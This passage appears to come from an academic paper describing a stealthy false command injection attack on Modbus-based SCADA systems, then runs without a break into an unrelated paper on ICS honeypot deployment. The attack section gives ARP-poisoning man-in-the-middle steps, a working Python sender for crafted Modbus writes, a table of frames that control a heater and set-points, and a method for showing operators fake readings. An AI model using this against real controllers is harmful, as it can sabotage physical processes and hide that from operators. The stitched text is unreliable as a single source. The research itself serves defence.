Based on those parameters, an attacker can easily extract and pair the Modbus packets as request-response frames. Moreover, he can analyze the packets more deeply and gather more detailed information about how each Modbus register affects the others. To quicken the comparison process during our injection, all duplicate pairs are eliminated, as depicted in Figure 6. Please note that duplicated messages can exist if there is a periodical status check between the PLC and HMI. Finally, to collect a sufficient number of request-response pairs, the sniffing process should last for a reasonably long period of time; in this work, we sniffed the network for approximately 30 minutes. For our virtual SCADA system presented in Figure 9, we successfully created a database containing 18 request-response pairs. It is worth mentioning that pairing the captured Modbus frames in our database into request-response frames helps the attacker to win the strict race condition that the HMI and PLC must meet before he replies with his forged Modbus response frame to the HMI.

B. Attack Phase (Online)

At the end of the previous stage, the attacker has the Modbus request-response frames that are frequently exchanged between the HMI and PLC. He can then start his major attack by first placing himself between the HMI and PLC (MITM position). This step is done using the well-known ARP poisoning approach. All messages will then go through the attacker's machine; the attacker drops the received request frame from the network, compares it to the ones existing in the database and finally responds to the HMI with the expected correct response accordingly.
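The request-response pairing performed in the pre-attack phase boils down to reading three header fields from each captured payload and using them as a lookup key. The Python sketch below illustrates that bookkeeping; it is a simplified illustration, not our exact tooling: the frames iterable, the direction labels and the byte offsets over the raw TCP payload are assumptions based on standard Modbus/TCP framing.

```python
# Group captured Modbus/TCP payloads into request/response pairs keyed by
# (transaction id, unit id, function code), as described in the pre-attack phase.
import struct
from collections import defaultdict

def parse_key(payload: bytes):
    """Extract (transaction_id, unit_id, function_code) from a Modbus/TCP ADU."""
    tid, _proto, _length, unit = struct.unpack(">HHHB", payload[:7])
    return tid, unit, payload[7]          # byte 7 is the function code

def build_database(frames):
    """frames: iterable of (direction, payload), direction being
    'request' (HMI -> PLC) or 'response' (PLC -> HMI)."""
    db = defaultdict(lambda: {"request": None, "responses": []})
    for direction, payload in frames:
        entry = db[parse_key(payload)]
        if direction == "request":
            entry["request"] = payload    # duplicate requests simply overwrite each other
        else:
            entry["responses"].append(payload)
    return dict(db)
```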
In the meantime, the attacker sends the PLC a malicious request frame, e.g., an R/W coils request, and also drops the original response sent from the PLC to the HMI. In the following, we illustrate this phase in detail.

Fig. 6: Scheme of creating our database

1) ARP Poisoning (MITM) Approach: The concept of an ARP poisoning attack comprises two parts: ARP spoofing and communication hijacking. In the first stage, an attacker manipulates the ARP cache of both the PLC and HMI devices by broadcasting malicious, forged "is-at" ARP messages over the network, as depicted in Figure 7. This technique forces both devices to send their packets through the attacker's MAC address, and requires the attacker to know only the IP and MAC addresses of the victims (e.g., HMI and PLC), which were already obtained in the early steps of the pre-attack phase.

Fig. 7: ARP Poisoning Attack

As soon as the ARP cache of each victim is spoofed, the traffic gets redirected through the attacker's machine. At this point, the attacker is capable of reading all the Modbus messages transmitted between the HMI and PLC and then forwarding them to their final destinations (interception attack), or of actively changing them before pushing them back to the network (modification attack). Please note that the HMI may generate a realistic state update while the HMI-PLC interactions are being decoupled. For this purpose, the adversary should reply to each Modbus request in real time. Moreover, TCP session hijacking requires the attacker to maintain the integrity of the TCP connection, e.g., appropriate TCP sequence numbers, to prevent losing the connection.

2) Stealthy Command Injection Attack: Figure 8 presents the full chain of our injection scenario. When a Modbus request frame is sent from the HMI to the PLC, the attacker intercepts this frame, drops it from the network, compares the frame to the request frames in his database, and finally computes the corresponding response(s) accordingly. Meanwhile, he sends a forged Modbus request frame (e.g., an R/W coils request) to the PLC, impersonating the HMI. This approach is quite severe, as the SCADA operator is tricked in a way that he is always shown fake views while the PLC is processing malicious commands sent by the attacker.

Fig. 8: Stealthy Command Injection Attack Scenario

This approach has a challenge. If the attacker stops his ARP poisoning attack, i.e., he stops sending fake response messages to the HMI, and the HMI then requests the PLC register values with a Modbus request frame, the PLC responds by reporting the current PLC status, i.e., the modified inputs and outputs. The SCADA operator can therefore discover that the system is operating abnormally. To overcome this challenge, and to make our attack even more severe than it already is, the attacker should re-initialize all the registers to the values stored prior to his attack.

Fig. 9: Virtual SCADA system based on OpenPLC and ScadaBR software
To this end, he needs to read all the register values before the attack, and to write these values back to the PLC before he closes the TCP communication with the devices. This restores the previous system state after stopping the attack, and the PLC will report to the HMI the last view prior to the injection.

V. IMPLEMENTATION AND EVALUATION

A. Experimental Settings

1) Lab Setup: We evaluate our attack approach on a virtual SCADA system based on OpenPLC and ScadaBR software, as shown in Figure 9. The given virtual system represents a water tank heater experiment. It aims at keeping the temperature of a water tank at a certain value, e.g., 40 °C. That is, if the temperature goes below 40 °C, the corresponding sensor (input) reports to the PLC, and the PLC responds by sending a control command to the heater (output) to switch it ON. The heater remains ON until the temperature is again as high as the configured set-point. This process works in two configuration modes: Auto and Manual. The interaction between OpenPLC and ScadaBR is handled using the Modbus protocol over TCP/IP, where ScadaBR is the master device and OpenPLC is the slave device. The control logic program is developed using the OpenPLC Editor in one of the five high-level programming languages defined in IEC 61131 [28]. The PLC program is then compiled to an ST file before being uploaded to the OpenPLC.

2) Attacker Model: We assume that an attacker has access to the level-3 network of the Purdue Model (https://www.goingstealthy.com/the-ics-prude-model/). This assumption is based on real-world SCADA attacks, e.g., the TRITON [29] and BlackEnergy [5] attacks, which got access to the control center via a typical IT attack vector such as an infected USB stick or a social engineering attack. After the level-3 network access, an attacker can make use of software and libraries to communicate with the target PLC over the network. Since these assumptions have been reported to hold true in reports on real-world attacks, we are convinced that our attack is a realistic one.

B. Attack Implementation

After placing the attacker in a MITM position between the ScadaBR and OpenPLC, he first reads all the current values that are stored in the PLC's memory registers, e.g., coils, inputs, etc. Figures 10, 11, 12, 13, 14 and 15 show all the request-response frames exchanged between the attacker and the OpenPLC to obtain these values. To inject the PLC with different false commands, we developed a simple Python script that sends crafted Modbus request frames to the target IP address on the open port 502. Table II shows the format of the frames we used to attack the given virtual system in Figure 9. For instance, if an attacker aims at turning the heater OFF in Auto mode, the following frame should be sent to the PLC: 0x010600040000. Our results showed that we could successfully modify different inputs, outputs and data stored in the PLC registers, as shown in Figure 16.

Fig. 10: Request frame sent from the attacker to the OpenPLC - Read all PLC coils

To conceal our injection from the SCADA operator, we developed an attacking tool that sniffs all the Modbus request frames from the network, compares them to the ones in our database, and finally responds with the appropriate response(s) to the HMI. Algorithm 1 depicts the main core of this attacking tool.
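For illustration, the following sketch shows how one of the Table II payloads can be wrapped in an MBAP header and pushed to TCP port 502 with nothing more than the Python standard library. It is a minimal stand-in for the kind of injection script described above, not our actual tool; the target address, transaction identifier and timeout are placeholders.

```python
# Send a single crafted Modbus/TCP "Write Single Register" frame (function 0x06).
# Example payload from Table II: unit 0x01, register 0x0004, value 0x0000
# ("Turning the Heater OFF (Auto Mode)").
import socket
import struct

def write_single_register(ip, unit, register, value, tid=1, port=502):
    pdu = struct.pack(">BHH", 0x06, register, value)           # function, address, value
    mbap = struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit)    # tid, protocol, length, unit
    with socket.create_connection((ip, port), timeout=2) as s:
        s.sendall(mbap + pdu)
        return s.recv(260)        # a well-behaved server echoes the write request

# write_single_register("192.168.0.10", unit=0x01, register=0x0004, value=0x0000)
```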
Fig. 11: Response frame from the OpenPLC - Only two coils have values: Bit 0 and 63
Fig. 12: Request frame from the attacker to the OpenPLC - Read all discrete registers
Fig. 13: Response frame from the OpenPLC - All the bits have the value of null
Fig. 14: Request frame from the attacker to the OpenPLC - Read all PLC holding registers
Fig. 15: Response frame from the OpenPLC - Only three registers have values in the PLC memory: Reg. 1, 2 and 3
Fig. 16: The HMI monitor before and after the attack

After launching our tool, if the ScadaBR sends a Modbus request (e.g., write single register) to the OpenPLC, our MITM system intercepts this frame, compares it with the ones existing in our database (precisely, with the request frames) and finally replies to the ScadaBR by sending the corresponding response frame(s) based on the Transaction ID, Unit ID, and Function Code. It is worth mentioning that the attacker still needs to drop the original request from the network to avoid updating the PLC's registers. However, this is an easy task, as the attacker only needs not to complete the full cycle of the MITM attack, i.e., he does not forward the frame to the final destination (the PLC).

Algorithm 1: FCI Attack based on the Database Approach
Function inject(iface=eno, src_port)
1:  packet = sniff(iface = eno, timeout = cfg_sniff_time)
2:  save_pcap(sniff.pcap)
3:  for pcap in rdpcap(save_pcap) do
4:      src_id = pcap[1:6], dest_id = pcap[7:12], mbus_pkt = filter_mbus(pcap)
5:      for pkt in mbus_pkt() do
6:          trans_id = pkt[1:2], Protocol_id = pkt[3:4], Length = pkt[5:6], Unit_id = pkt[7], function = pkt[8:9], start_address = pkt[10:11], data = pkt[12:]
7:          if (src_ip = ScadaBR_src_ip & dest_ip = plc_ip) then
8:              for p in rdpcap(response_pcap) do
9:                  if trans_id == p[1:2] & unit_id == p[7] & function == p[8:9] then
10:                     fgd_pkt = p[1:]; break
11:                 end if
12:                 P = P + 1
13:             end for
14:         end if
15:         pkt = pkt + 1
16:     end for
17:     pcap = pcap + 1
18: end for
19: while time_slot() do
20:     sendp(iface, fgd_pkt, src_ip, port)
21: end while
END Function

Table II: Modbus frames and their corresponding actions
Action | Modbus frame
Turning the Heater ON (Manual Mode) | 0x01 0x06 0x00 0x05 0x00 0x01
Turning the Heater OFF (Manual Mode) | 0x01 0x06 0x00 0x05 0x00 0x00
Turning the Heater ON (Auto Mode) | 0x01 0x06 0x00 0x04 0x00 0x01
Turning the Heater OFF (Auto Mode) | 0x01 0x06 0x00 0x04 0x00 0x00
Setting a new temperature | 0x01 0x06 0x00 0x01 0x2f 0xff
Setting a new set-point | 0x01 0x06 0x00 0x02 0x2f 0xff

VI. SECURITY COUNTERMEASURES

Our experiments presented in this paper showed that there is no security in the Modbus protocol. Therefore, if attackers can access a Modbus device on a network, they are able to read/write whatever and whenever they want. Based on this fact, many industrial engineers implemented firewalls between the internet server and the control network to protect their systems, i.e., all the Modbus devices are placed behind the firewalls, see Figure 17.

Fig. 17: SCADA system architecture using firewalls

This method separates Modbus devices from the internet, but if any server behind the firewall is authorized to access the Modbus devices through the firewall, there is a vulnerability. Therefore, implementing firewalls alone, without any additional security measures, partly fails to prevent cyber-attacks. The advanced firewall presented in [30] would be a more reasonable protection method. The authors designed an industrial-specific firewall based on the Modbus protocol. Their firewall combines security policies with Deep Packet Inspection (DPI). An alternative solution would be using the modified version of the Modbus protocol introduced in [31]. This new protocol version implements anti-replay techniques and authentication mechanisms that validate each packet received at Modbus devices. Another appropriate solution would be the one introduced in [32], which deploys security functions in the messaging stack prior to transmission. The authors used AES [33], RSA [34], or SHA-2 [35] algorithms to encrypt the Modbus packet, while a secret key is exchanged between the master and the slave using a separate secure channel. All the aforementioned security methods are reasonable solutions to secure Modbus based SCADA systems against our injection attack or similar scenarios, if they are implemented.

VII. CONCLUSION AND FUTURE WORK

This paper presented a false command injection (FCI) attack scenario against Modbus based SCADA systems, where an external adversary exploited insecurities of the Modbus protocol and injected the target PLC with malicious commands. To make our attack more challenging, we involved a database containing real request-response interaction pairs, which helps the adversary to always reply to the HMI with the expected responses. This conceals our attack from the operator and decouples the PLC from the HMI, i.e., the operator will not notice any abnormal behavior on the control site. Our attack scenario is quite severe in case it is conducted against real-world SCADA systems, and the consequences could be disastrous if the targets are critical infrastructures or nuclear plants. To secure Modbus based SCADA systems, plants, and industrial environments, we suggested some security countermeasures that assist in mitigating/detecting our attack or similar scenarios if they are applied.

In respect of securing SCADA systems, the Modbus organization released a newer Modbus protocol variant, namely Modbus Transport Layer Security (TLS, https://modbus.org/docs/MB-TCP-Security-v21_2018-07-24.pdf), running on port 802. This advanced protocol adds security specifications that the traditional Modbus protocol lacks (e.g., authentication and message-integrity mechanisms) to prevent cyber-attacks such as DoS, MITM and replay attacks. The Modbus TLS variant has not yet been well analyzed by researchers from the security point of view. Thus, we aim in the future to investigate this newer protocol against our attack approach, as the Modbus organization claims that it is more resilient against cyber-attacks and is even secured by an additional security layer between the server and client devices. Therefore, investigating the security of such a protocol will be more challenging and complex.

REFERENCES
[1] A. S. Aragó, E. R. Martínez and S. S. Clares, "SCADA Laboratory and Test-bed as a Service for Critical Infrastructure Protection," in Proceedings of the 2nd International Symposium on ICS & SCADA Cyber Security Research, St. Pölten, Austria, 11-12 September 2014. DOI: 10.14236/EWIC/ICS-CSR2014.4.
[2] L. Rosa, T. Cruz, P. Simões, E. Monteiro and L. Lev, "Attacking SCADA systems: A practical perspective," 2017 IFIP/IEEE Symposium on Integrated Network and Service Management (IM), 2017, pp. 741-746, doi: 10.23919/INM.2017.7987369.
[3] W. Alsabbagh and P. Langendörfer, "A New Injection Threat on S7-1500 PLCs - Disrupting the Physical Process Offline," IEEE Open Journal of the Industrial Electronics Society, vol. 3, pp. 146-162, 2022, doi: 10.1109/OJIES.2022.3151528.
[4] N. Falliere, "Exploring Stuxnet's PLC infection process," in Virus Bulletin Covering Global Threat Landscape Conf., Sep. 2010.
[5] R. M. Lee, M. J. Assante, and T. Conway, "Analysis of the cyber-attack on the Ukrainian power grid," Technical report, SANS E-ISAC, March 18, 2016. Available at: https://ics.sans.org/media/ESAC_SANS_Ukraine_DUC_5.pdf.
[6] Z. Dehlawi and N. Abokhodair, "Saudi Arabia's response to cyber conflict: A case study of the Shamoon malware incident," 2013 IEEE International Conference on Intelligence and Security Informatics, 2013, pp. 73-75, doi: 10.1109/ISI.2013.6578789.
[7] Verizon. (2016) Data breach digest. Scenarios from the field. [Online]. Available at: https://www.ndia.org/-/media/sites/ndia/meetings-and-events/divisions/cfam/past-events/2016-august/cfam-forum-slides verizon-data-breach-digest.ashx?mod=article_inline.
[8] R. M. Lee, M. J. Assante, and T. Conway, "German steel mill cyber attack," Industrial Control Systems, vol. 30, p. 62, 2014.
[9] M. A. Teixeira, T. Salman, M. Zolanvari, R. Jain, N. Meskin and M. Samaka, "SCADA System Testbed for Cybersecurity Research Using Machine Learning Approach," Future Internet, vol. 10, 2018. DOI: 10.3390/fi10080076.
[10] Modicon Inc., Modicon Modbus Protocol Reference Guide, PI-MBUS-300 Rev., June 1996.
[11] J. Slay and M. Miller, "Lessons learned from the Maroochy water breach," Critical Infrastructure Protection, volume 253/2007, pages 73-82. Springer, Boston, November 2007.
[12] P. Huitsing, R. Chandia, M. Papa, and S. Shenoi, "Attack taxonomies for the Modbus protocols," International Journal of Critical Infrastructure Protection, vol. 1, pp. 37-44, 2008.
[13] T. H. Morris, B. A. Jones, R. B. Vaughn, and Y. S. Dandass, "Deterministic intrusion detection rules for Modbus protocols," in 2013 46th Hawaii International Conference on System Sciences. IEEE, 2013, pp. 1773-1781.
[14] W. Gao and T. H. Morris, "On cyber attacks and signature based intrusion detection for Modbus based industrial control systems," Journal of Digital Forensics, Security and Law, vol. 9, no. 1, p. 3, 2014.
[15] R. Nardone, R. J. Rodríguez, and S. Marrone, "Formal security assessment of Modbus protocol," in 2016 11th International Conference for Internet Technology and Secured Transactions (ICITST). IEEE, 2016, pp. 142-147.
[16] N. Tsalis, G. Stergiopoulos, E. Bitsikas, D. Gritzalis, and T. K. Apostolopoulos, "Side channel attacks over encrypted TCP/IP Modbus reveal functionality leaks," in ICETE (2), 2018, pp. 219-229.
[17] C. Parian, T. Guldimann, and S. Bhatia, "Fooling the master: Exploiting weaknesses in the Modbus protocol," Procedia Computer Science, vol. 171, pp. 2453-2458, 2020.
[18] Q. Bai, B. Jin, D. Wang, Y. Wang and X. Liu, "Compact Modbus TCP/IP protocol for data acquisition systems based on limited hardware resources," Journal of Instrumentation, 13(04):T04004-T04004. DOI: 10.1088/1748-0221/13/04/T04004.
[19] R. Nardone, R. J. Rodríguez and S. Marrone, "Formal security assessment of Modbus protocol," in Proceedings of the 2016 11th International Conference for Internet Technology and Secured Transactions (ICITST), pp. 142-147, IEEE, Barcelona, Spain, December 2016.
[20] A. Volkova, M. Niedermeier, R. Basmadjian, and H. D. Meer, "Security challenges in control network protocols: a survey," IEEE Communications Surveys & Tutorials, vol. 21, no. 1, pp. 619-639, 2019.
[21] L. Rosa, M. Freitas, S. Mazo, E. Monteiro, T. Cruz, and P. Simões, "A comprehensive security analysis of a SCADA protocol: from OSINT to mitigation," IEEE Access, vol. 7, Article ID 42156, 2019.
[22] A. M. Abdul and S. Umar, "Data integrity and security [DIS] based protocol for cognitive radio ad hoc networks," Indonesian Journal of Electrical Engineering and Computer Science, vol. 5, no. 1, pp. 187-195, 2017.
[23] K. Rambabu and N. Venkatram, "Contemporary affirmation of security and intrusion handling strategies of internet of things in recent literature," Journal of Theoretical and Applied Information Technology, vol. 96, no. 9, pp. 2729-2744, 2018.
[24] S. Bhatia, N. Kush, C. Djamaludin, A. Akande, and E. Foo, "Practical Modbus flooding attack and detection," in Proceedings of the Twelfth Australasian Information Security Conference (AISC 2014) [Conferences in Research and Practice in Information Technology, Volume 149], pp. 57-65, Australian Computer Society, Inc., Auckland, New Zealand, January 2014.
[25] A. M. Abdul and S. Umar, "Attacks of denial-of-service on networks layer of OSI model and maintaining of security," Indonesian Journal of Electrical Engineering and Computer Science, vol. 5, no. 1, pp. 181-186, 2017.
[26] L. Rajesh and P. Satyanarayana, "Detecting flooding attacks in communication protocol of industrial control systems," International Journal of Advanced Computer Science and Applications, vol. 11, no. 1, 2020.
[27] B. Chen, N. Pattanaik, A. Goulart, L. Karen, B. Purry, and D. Kundur, "Implementing Attacks for Modbus/TCP Protocol in a Real-Time Cyber Physical System Test bed," in Proceedings of the 2015 IEEE International Workshop Technical Committee on Communications Quality and Reliability (CQR), pp. 1-6, IEEE, Charleston, SC, USA, May 2015.
[28] M. Tiegelkamp and K. John, IEC 61131-3: Programming Industrial Automation Systems. Springer, 1995.
[29] "Attackers Deploy New ICS Attack Framework TRITON, and Cause Operational Disruption to Critical Infrastructure." Accessed: Apr. 12, 2021. [Online]. Available: https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html.
[30] W. Shang, Q. Qiao, M. Wan, and P. Zeng, "Design and implementation of industrial firewall for Modbus/TCP," JCP, vol. 11, no. 5, pp. 432-438, 2016.
[31] I. N. Fovino, A. Carcano, M. Masera, and A. Trombetta, "Design and implementation of a secure Modbus protocol," in International Conference on Critical Infrastructure Protection. Springer, 2009, pp. 83-96.
[32] A. Shahzad, M. Lee, Y.-K. Lee, S. Kim, N. Xiong, J.-Y. Choi, and Y. Cho, "Real time MODBUS transmissions and cryptography security designs and enhancements of protocol sensitive information," Symmetry, vol. 7, no. 3, pp. 1176-1210, 2015.
[33] J. Daemen and V. Rijmen, The Design of Rijndael: AES - the Advanced Encryption Standard. Springer Science & Business Media, 2013.
[34] R. L. Rivest, A. Shamir, and L. Adleman, "A method for obtaining digital signatures and public-key cryptosystems," Communications of the ACM, vol. 21, no. 2, pp. 120-126, 1978.
[35] "Secure Hash Algorithm 2," National Institute of Standards and Technology (NIST), Standard, 2002.
Fake_PLC_in_the_Cloud_We_Thought_the_Attackers_Believed_that_How_ICS_Honeypot_Deception_Gets_Impacted_by_Cloud_Deployments.pdf
The Industrial Control System (ICS) industry faces an ever-growing number of cyber threats, defence against which can be strengthened using honeypots. Like the systems they mimic, ICS honeypots shall be deployed in a similar context to field ICS systems. This ICS context demands a novel honeypot deployment process that is more consistent with real ICS systems. State-of-the-art ICS honeypots mainly focus on deployments in cloud environments, which could divulge the true intent to cautious adversaries. This experimental research project addresses this limitation by evaluating the deception capability of a public cloud and an on-premise deployment. Results from a 65-day HoneyPLC experiment show that the on-premise deployment attracts more Denial of Service and Reconnaissance ICS attacks. The results guide future researchers that an on-premise deployment might be more convincing and attract more ICS-relevant interactions.
Fake PLC in the cloud, we thought the attackers believed that: How ICS honeypot deception gets impacted by cloud deployments?
Stanislava Ivanova, Naghmeh Moradpoor
School of Computing, Engineering and the Built Environment, Edinburgh Napier University, Edinburgh, UK
[email protected], [email protected]

Index Terms: Industrial Control Systems, Critical National Infrastructure, Programmable Logic Controllers, Supervisory Control & Data Acquisition, Industrial Honeypot

I. INTRODUCTION

Operational Technology (OT) or Industrial Control Systems (ICS) have been considered secure for decades, as they have been isolated by an "air gap". This air gap is the space between the control systems and the organisation managing those systems, which has been guarded by fences and locked doors [5]. However, this gap has been closed by the increased convergence between IT and OT, which exposes ICS systems to a more significant risk [1]. Looking into one of the most advanced ICS attacks, the Stuxnet worm, reveals that one of the vulnerabilities leveraged by the worm received a public patch two years before the Stuxnet attack. That vulnerability was first discovered after being exploited by another well-known worm, the Conficker worm, revealing timely patching challenges. The recent war in Ukraine and subsequent cyber attacks on critical infrastructure show that attacks targeting ICS tend to advance in combat [16].

IT security controls come in different forms, where Defence-in-Depth is considered the best practice [2]. This strategy recommends a layered approach to slow the attacker down while buying time for defenders to detect and respond to the attack. One of the defence layers that can improve security is the honeypot [4]. Honeypots are systems designed to be breached. Their single purpose is to be compromised, making every attempt to connect to them suspicious [3].

This paper addresses the efficiency of honeypot deployment and specifically investigates the following aims:
- To summarise the limitations of existing ICS honeypot deployments.
- To evaluate the impact of deploying an ICS honeypot in the cloud versus on-premise through experimental investigation.

The structure of this study is as follows: the discussion of the Related Work in Section II is followed by Section III, which outlines the architecture design for the experimental work. The results and discussion are given in Section IV, followed by the conclusion in Section V.

II. RELATED WORK

Available literature in the field of ICS honeypots focuses on different deployment infrastructures. These include, among others, public cloud deployments of ICS honeypots [8], [9] and on-premise deployments exposed to the internet [17]. However, to the best of our knowledge, the work in the ICS honeypot field is more focused on improving the functionality and complexity of the honeypots and less so on the deception impact of the deployment location. The following section presents current work on ICS honeypot development, focusing on the deployment location the surveyed studies have implemented.

Public cloud deployments are those using public cloud providers to minimise maintenance costs. This advantage makes cloud deployment a desirable method for most researchers, despite the deployment's discrepancy from ICS-native infrastructure. López-Morales et al. [8] improved a Honeyd-based honeypot to achieve a medium-interaction honeypot. This improvement is achieved by implementing an interactive web interface, S7Comm, web and SNMP services.
The implementation is deployed in the cloud, where four attacks are recorded. A hybrid ICS honeypot implementation is deployed in a hosting company by You et al. [9]. The cloud deployment is connected with an on-site deployment with physical PLCs, hence the hybrid nature of the honeynet. The cloud front end handles a list of predefined ICS protocol requests while the back-end PLCs handle the rest, bringing novelty to ICS honeypot development. However, this deployment fails to acknowledge that recognising a PLC honeypot by observing the cloud infrastructure is trivial.

Lastly, Rashid et al. [18] propose a multi-platform honeypot, which includes a Conpot-based ICS honeypot. The experiment, which is deployed in the public cloud, collects a limited amount of interactions on the PLC interface, which brings unconvincing results.

The related work surveyed here focused on advancing the functionality and sophistication of ICS honeypots. However, few acknowledge the deployment location's role in the honeypot's deception capability. Honeypot sophistication efforts bring little value without a consistently deceptive deployment location, and vice versa. To the best of our knowledge, none of the present research measures the effect that cloud deployment might have on the deception capability of ICS honeypots.

TABLE I. LITERATURE REVIEW OF EXISTING WORK IN ICS HONEYPOT DEVELOPMENT
Year | Title | Attacks | Deployment
2020 | HoneyPLC: A next-generation honeypot for industrial control systems [8] | Four | Public cloud
2021 | HoneyVP: A cost-effective hybrid honeypot architecture for industrial control systems [9] | None | Public cloud
2022 | Faking smart industry: exploring cyber-threat landscape deploying cloud-based honeypot [18] | None | Public cloud
2023 | This paper | One | On-premise

In this study, we propose a novel implementation of HoneyPLC which, unlike the study by López-Morales et al. [8], deploys HoneyPLC on a hardware device on-premise. Our improvement differs from the proposed implementations by You et al. [9] and Rashid et al. [18], which are deployed in the cloud. Thus, it evaluates the deployment method's role in the amount of valuable attack data attracted. Finally, this paper proposes a honeypot installation approach on a physical machine, where a more recently developed honeypot, HoneyPLC, is used.

III. EXPERIMENT ARCHITECTURE

An ICS honeypot covert deployment shall start with an ICS-consistent deployment, as suggested by Rowe et al. [6]. The choice of deployment, if not selected well, may turn away a potential attacker before they interact with the ICS honeypot. An attacker interacting with the honeypot shall have a similar experience to a real-world ICS device [6]. The detail of the honeypot interfaces is key to deceiving the attacker or public scanners (e.g. Shodan.io). Reconnaissance tools like Shodan use a HoneyScore evaluation algorithm to evaluate whether an internet-exposed system is a disguised honeypot. Shodan uses a proprietary algorithm to calculate a number from 0.0 to 1.0 to distinguish honeypots (when the score is close to 1.0) from genuine systems (honeyscore close to 0.0) [6]. Shodan-identified honeypots often have Shodan-attached tags like "cloud" or "hosting" and "honeypot" together.
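For readers who want to check how their own exposed services score, the HoneyScore can be queried programmatically. The sketch below is an assumption-laden illustration: it relies on the publicly documented Shodan REST endpoint for Honeyscore, takes the plain numeric response format on faith, and requires a valid API key; the IP address shown is a placeholder.

```python
# Query Shodan's Honeyscore for a public IP (endpoint path and plain-number
# response format are assumptions based on Shodan's public API documentation).
import requests

def honeyscore(ip, api_key):
    url = f"https://api.shodan.io/labs/honeyscore/{ip}"
    resp = requests.get(url, params={"key": api_key}, timeout=10)
    resp.raise_for_status()
    return float(resp.text)    # 0.0 = looks genuine ... 1.0 = almost certainly a honeypot

# print(honeyscore("203.0.113.7", "YOUR_API_KEY"))   # placeholder IP and key
```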
The honeypot selected for this experiment is HoneyPLC, which provides medium interaction: more deceptive than a low-interaction honeypot, yet still allowing cost-efficient deployment on a physical machine without the unnecessary complexity of a high-interaction honeypot. The experiment setup presented in Figure 1 comprises a physical machine running Ubuntu 18.04 LTS and the HoneyPLC server, located in a residential building in Aarhus, Denmark. A managed switch replicates the HoneyPLC traffic and mirrors it to the logging machine. A router with a residential internet line forwards the ports of the HTTP and S7Comm services, which listen on a static IP on TCP ports 80 and 102.
Fig. 1. Private infrastructure deployment.
An identical infrastructure is deployed with a public cloud provider in Frankfurt, Germany. This setup provides the basis for the experimental evaluation, allowing the efficacy of the two deployment methods to be compared. The main difference in the cloud setup is the addition of a gateway server, a port-filtering device.
A dedicated machine performs the data collection to maintain data integrity. This machine logs all packets from the HoneyPLC. As depicted in Figure 1, a switch is placed between the HoneyPLC and the gateway to replicate the HoneyPLC traffic. The logging machine uses Wireshark, a packet capture tool that sniffs packets transmitted or received on a network interface [10]. The capture yields a Packet Capture (PCAP) file of internet-initiated connections that still mixes relevant and irrelevant traffic. A method inspired by Ferretti et al. [7], adapted to this project's needs, is used to filter and analyse the traffic (a minimal sketch of this pipeline follows the list):
1) Input the raw traffic into Wireshark to filter and analyse only relevant information.
2) Identify scanners: remove duplicate IP addresses and correlate IP addresses with owner names using Wireshark's integrated name resolution (DNS PTR records).
3) Manually observe and extract a list of scanner IP addresses.
4) Use the generated list to filter out all packets associated with scanners and crawlers.
5) Observe the remaining traffic for attack patterns, filtering on the ICS protocol: S7Comm.
Data from the on-premise deployment gains meaning only when juxtaposed with the data collected from the cloud deployment. Therefore, a cloud HoneyPLC deployment is implemented for reference. Cloud deployment data collection and analysis are logically identical to the on-premise deployment.
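The following minimal sketch illustrates steps 1-5 above on an exported capture. Scapy, the reverse-DNS lookups, the scanner-name hints and the file name are illustrative substitutes for the manual Wireshark workflow described in the text, not the authors' exact tooling.

```python
# Minimal sketch of the five filtering steps, run on an exported PCAP file.
# Scapy, the hint list and the file name are assumptions for illustration.
import socket
from scapy.all import rdpcap, IP, TCP

SCANNER_HINTS = ("shadowserver", "censys", "shodan")  # assumed hint list
S7COMM_PORT = 102                                     # S7Comm listens on TCP 102

def reverse_dns(ip):
    """Step 2: correlate an IP address with its owner via the DNS PTR record."""
    try:
        return socket.gethostbyaddr(ip)[0].lower()
    except OSError:
        return ""

packets = rdpcap("honeypot_capture.pcap")             # step 1: raw captured traffic
sources = {p[IP].src for p in packets if IP in p}     # unique source addresses

scanners = set()                                      # steps 2-3: build the scanner list
for ip in sources:
    hostname = reverse_dns(ip)
    if any(hint in hostname for hint in SCANNER_HINTS):
        scanners.add(ip)

# Step 4: drop scanner traffic; step 5: keep only S7Comm (TCP port 102) packets.
s7_candidates = [p for p in packets
                 if IP in p and TCP in p
                 and p[IP].src not in scanners
                 and S7COMM_PORT in (p[TCP].sport, p[TCP].dport)]

print(f"{len(sources)} unique IPs, {len(scanners)} scanner IPs, "
      f"{len(s7_candidates)} non-scanner S7Comm packets")
```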
IV. RESULTS AND DISCUSSION
The experiment consisted of two identical HoneyPLC deployments: one in the cloud and the other on-premise. Both deployments collected data for 65 days, from November 2022 until January 2023, and both followed the instructions provided by the HoneyPLC creators [8]. The collected results are grouped based on common characteristics.
The first step is to enumerate the public scanners interacting with the deployments. Public scanners usually do not mount targeted attacks but enumerate online devices by sending requests or probes and analysing the responses. Some internet scanners specifically look for ICS devices in order to inform agencies. Wireshark's built-in name resolution capability was used to distinguish the internet scanners. This feature resolves IP addresses to domain names, which can later be correlated with organisations. Figure 2 depicts how many unique IP addresses communicated with the cloud and on-premise deployments, how many of those addresses are associated with well-known scanners, and the contribution of the top scanner organisation, Shadowserver.
Fig. 2. Well-known scanner unique IP addresses (unique IP addresses / total scanner IP addresses / shadowserver.org): cloud 4,568 / 797 / 326; on-premise 3,421 / 807 / 338.
Geolocating the origin of traffic is sometimes helpful in tracking trends. Wireshark's MaxMind database integration is used to map IP addresses to a country of origin [11]. When comparing the interest in both deployments, a shift can be observed: the second most web-service-interacting country for the cloud deployment is the UK, whereas for the on-premise deployment it is Germany. Looking at the ICS-interacting countries, China moves into second place, while the USA consistently remains the country interacting the most with both deployments, regardless of the listening service. A further difference in ICS interactions is observed in the third most common source country, which for the cloud is the UK and for on-premise is Portugal. An IP address originating from a specific country does not mean that the interaction originated there, as devices in foreign countries can be compromised and later used as proxies to hide the true origin.
